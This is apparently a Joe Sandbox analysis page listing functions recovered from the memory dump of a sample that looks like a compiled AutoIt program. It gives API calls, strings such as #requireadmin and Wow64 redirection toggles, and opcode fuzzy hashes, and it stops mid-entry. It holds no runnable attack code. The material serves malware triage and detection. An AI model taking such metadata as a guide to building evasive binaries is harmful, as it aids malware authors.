Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 709b035e05d766fd71d26ee61b27622e415b9634efdcff4be2ad3038ffa6e617
Instruction ID: e871bfbcf4290b49a4d4d383ce0849dfabca1d771bcf0fb9a292c9bcad2c2b8c
Opcode Fuzzy Hash: 709b035e05d766fd71d26ee61b27622e415b9634efdcff4be2ad3038ffa6e617
Instruction Fuzzy Hash: EF11F77640010CFFDF129F90DC88EAA7F6CEB08350F04C01AFA599A1A1C7759D95DBA0

Function 00731BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00731BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00731BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00731C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00731C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00731C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00731C22

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b8b9d22dc3fe60d14565962de263d60ae832ce4ba791e13da2409e70aff79d61
Instruction ID: 47701ac711b9abb8b3937981ebf4ce68b69ea6e0e9b053aa7365f60b6f293fa8
Opcode Fuzzy Hash: b8b9d22dc3fe60d14565962de263d60ae832ce4ba791e13da2409e70aff79d61
Instruction Fuzzy Hash: 650167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00415BE15C4BA42C7F5A864CBE5

Function 00754D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00754D1E,?,?,00754CBE,?,007F88B8,0000000C,00754E63,?,00000000), ref: 00754D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00754DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00754D1E,?,?,00754CBE,?,007F88B8,0000000C,00754E63,?,00000000,00000000), ref: 00754DC3

Strings

CorExitProcess, xrefs: 00754D98
mscoree.dll, xrefs: 00754D86

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9d43ff430f6d347b8730e8172f480628911bc96ce2d86effcc58dbdc05c918a9
Instruction ID: 01437544a0736930dfdb3cbb8792d1e7fe9053cb20013a2ecce06d2d8c1474ef
Opcode Fuzzy Hash: 9d43ff430f6d347b8730e8172f480628911bc96ce2d86effcc58dbdc05c918a9
Instruction Fuzzy Hash: 17F0AF30A00208BBDB129F90DC09FEEBFB5EF04712F0440A8FD09A2260CB785D84CAD4

Function 00734E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00734EDD,?,00801418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00734E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00734EAE
FreeLibrary.KERNEL32(00000000,?,?,00734EDD,?,00801418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00734EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00734EA8
kernel32.dll, xrefs: 00734E94

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 0345eca22966fa603f938d44540f2c173d528748c1fcc8bd9ef00830e9c7d8e0
Instruction ID: 492b5af3629bed1b3bd89145d9689c9b0f6f736a306262744c3b04349b472505
Opcode Fuzzy Hash: 0345eca22966fa603f938d44540f2c173d528748c1fcc8bd9ef00830e9c7d8e0
Instruction Fuzzy Hash: B6E0CD75E415225BE2331B266C18F6F6754AFC1F62F0D411DFD08D3211DB6CDD0240A4

Function 00734E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00734E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00734E74
FreeLibrary.KERNEL32(00000000), ref: 00734E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00734E6E
kernel32.dll, xrefs: 00734E5B

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: f84730ec2022bd2a3897e32b6bab1de1bf7800375652717d7d415ed1bb93ecf6
Instruction ID: 350dcb54b2d8c5fe914f8595c87b82b63e465df498dc939be9cce0640a0c2b37
Opcode Fuzzy Hash: f84730ec2022bd2a3897e32b6bab1de1bf7800375652717d7d415ed1bb93ecf6
Instruction Fuzzy Hash: D7D02B7294263157A6331B26BC0CE8F2B18AF81F1130D411CF908E3111CF2CCD02C1D4

Function 00749639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00749693
SelectObject.GDI32(?,00000000), ref: 007496A2
BeginPath.GDI32(?), ref: 007496B9
SelectObject.GDI32(?,00000000), ref: 007496E2

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d78bc21ac833eca9d48970732c9d11e622154328448bf2151ff98bd18cf8247f
Instruction ID: 52a926c92276e57b70d2fc43f7fee9d375ca40e6b025668b3e583dd1c4c55b0c
Opcode Fuzzy Hash: d78bc21ac833eca9d48970732c9d11e622154328448bf2151ff98bd18cf8247f
Instruction Fuzzy Hash: F3218B70902305EFDF119F25EC0CBAA3FA8BB50325F51421AF914A61B0D3789892CB96

Function 0079E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000), ref: 0079E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0079E9A5
Sleep.KERNEL32(00000000), ref: 0079E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0079E9B7
Sleep.KERNEL32(?,00000000), ref: 0079E9F3

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c575728e130e016deb0f92d77198173f2f947f6c301cfffa8dbd9b9504aabcba
Instruction ID: 957b2d5eaa231554c2291745979f7b360c2dd86afd5699eb5ab1aeca0aee46ab
Opcode Fuzzy Hash: c575728e130e016deb0f92d77198173f2f947f6c301cfffa8dbd9b9504aabcba
Instruction Fuzzy Hash: 09015B71C0152DDBCF00DBE5EC5AADDBB78FB09320F05454AE902B2141DB38A951C7A6

Function 007A030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,007A017D,?,007A32FC,?,00000001,00772592,?), ref: 007A0324
CloseHandle.KERNEL32(?,?,?,?,007A017D,?,007A32FC,?,00000001,00772592,?), ref: 007A0331
CloseHandle.KERNEL32(?,?,?,?,007A017D,?,007A32FC,?,00000001,00772592,?), ref: 007A033E
CloseHandle.KERNEL32(?,?,?,?,007A017D,?,007A32FC,?,00000001,00772592,?), ref: 007A034B
CloseHandle.KERNEL32(?,?,?,?,007A017D,?,007A32FC,?,00000001,00772592,?), ref: 007A0358
CloseHandle.KERNEL32(?,?,?,?,007A017D,?,007A32FC,?,00000001,00772592,?), ref: 007A0365

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 03daed25a7e61b083574e8201b0228d102de2ab8b4b8438b5878eaaf72b39f34
Instruction ID: cf0c828362a18734cf0996f4f6c709b18c6ceaabfbb34a1e9955200c71951efb
Opcode Fuzzy Hash: 03daed25a7e61b083574e8201b0228d102de2ab8b4b8438b5878eaaf72b39f34
Instruction Fuzzy Hash: 9E01AA72800B159FCB30AF66D880812FBF9BFA13153158E3FD19652931C3B5A998DF80

Function 007495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007495D4
StrokeAndFillPath.GDI32(?,?,007871F7,00000000,?,?,?), ref: 007495F0
SelectObject.GDI32(?,00000000), ref: 00749603
DeleteObject.GDI32 ref: 00749616
StrokePath.GDI32(?), ref: 00749631

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 24eac3ee59b6e801def990faf5265696fe5b652bbcca88d01dc86041caa1498a
Instruction ID: acc49a588e87f7afd5e5a363b63824d56490c701ea944f60e7a037e5b82ed3c0
Opcode Fuzzy Hash: 24eac3ee59b6e801def990faf5265696fe5b652bbcca88d01dc86041caa1498a
Instruction Fuzzy Hash: CFF03731006208EBDB629F69ED1CBA53F61BB00332F548218F569550F0D73889A1DF26

Function 007B7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00750242: RtlEnterCriticalSection.NTDLL(0080070C), ref: 0075024D
Part of subcall function 00750242: RtlLeaveCriticalSection.NTDLL(0080070C), ref: 0075028A

Part of subcall function 00739CB3: _wcslen.LIBCMT ref: 00739CBD

__Init_thread_footer.LIBCMT ref: 007B7BFB

Part of subcall function 007501F8: RtlEnterCriticalSection.NTDLL(0080070C), ref: 00750202
Part of subcall function 007501F8: RtlLeaveCriticalSection.NTDLL(0080070C), ref: 00750235

Strings

Variable must be of type 'Object'., xrefs: 007B7C3A
5, xrefs: 007B7C78
G, xrefs: 007B7C7F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 2919631681-3733170431
Opcode ID: 47b7c64b728b69ed5ae4733ddbc8c6ef5b4d5089af78fffd706c87bf79e290ff
Instruction ID: 46f9bc4e2dbea18c4599e05460b8a341e3f2bd2f92ef38505018da3d3a27a994
Opcode Fuzzy Hash: 47b7c64b728b69ed5ae4733ddbc8c6ef5b4d5089af78fffd706c87bf79e290ff
Instruction Fuzzy Hash: 89916A70A04209EFCB18EF54D895EEDB7B5FF84340F148059F8069B292DB79AE45CB61

Function 0079C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0079C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0079C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00801990,016F3490), ref: 0079C395

Strings

0, xrefs: 0079C2DF

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: f7445182eda21f9e72fd29ae6b170b139a869d7b80d9dc7c4278c89e9c7d7c72
Instruction ID: b9d69bc702ca27337b91edb08caf742e64f606c074a0cf17d88076c2b00207cc
Opcode Fuzzy Hash: f7445182eda21f9e72fd29ae6b170b139a869d7b80d9dc7c4278c89e9c7d7c72
Instruction Fuzzy Hash: 1841AE71204301DFDF21DF28E885B5ABBE4AF85320F108A1DF9A597291D778A904CB62

Function 007995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0079961D

Strings

#OnAutoItStartRegister, xrefs: 007995F3
#requireadmin, xrefs: 007995D9
#notrayicon, xrefs: 007995B7

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 2d345eed3fdb9aa8e6f1185a2cf574d3c02aa1de34e43fa282b10d38c3ee2cf6
Instruction ID: a1aa85386f5ec0d1aede070d96d7bbdd5f1fdf4f5586f1ab1ec627b23b03587c
Opcode Fuzzy Hash: 2d345eed3fdb9aa8e6f1185a2cf574d3c02aa1de34e43fa282b10d38c3ee2cf6
Instruction Fuzzy Hash: 112138B2104510E6FB31AB2CAC07FBB73A89F51310F10402EFA5997081EB9DAD55C3D6

Function 0076D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000004,00000000,00000000,?,00000012,00000000,?,00000001,00000004,?,00000001,?,?), ref: 0076D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0076D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0076D9AB
__freea.LIBCMT ref: 0076D9B4

Part of subcall function 00763820: RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 00763852

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 118e227b737c09ed7472196ece8f86bb8dec9daf79fac58a3c29ae18d78a9bee
Instruction ID: bb7f88e0468b999491b70dd9081051a001ccf33979e8cd8463498ff49af38e2e
Opcode Fuzzy Hash: 118e227b737c09ed7472196ece8f86bb8dec9daf79fac58a3c29ae18d78a9bee
Instruction Fuzzy Hash: D931DC72E1020AABDF258F65DC45EEF7BA5EB40310B094168FC0AD7251EB39ED54CBA0

Function 007C52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 007C5352
GetWindowLongW.USER32(?,000000F0), ref: 007C5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007C53A8

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
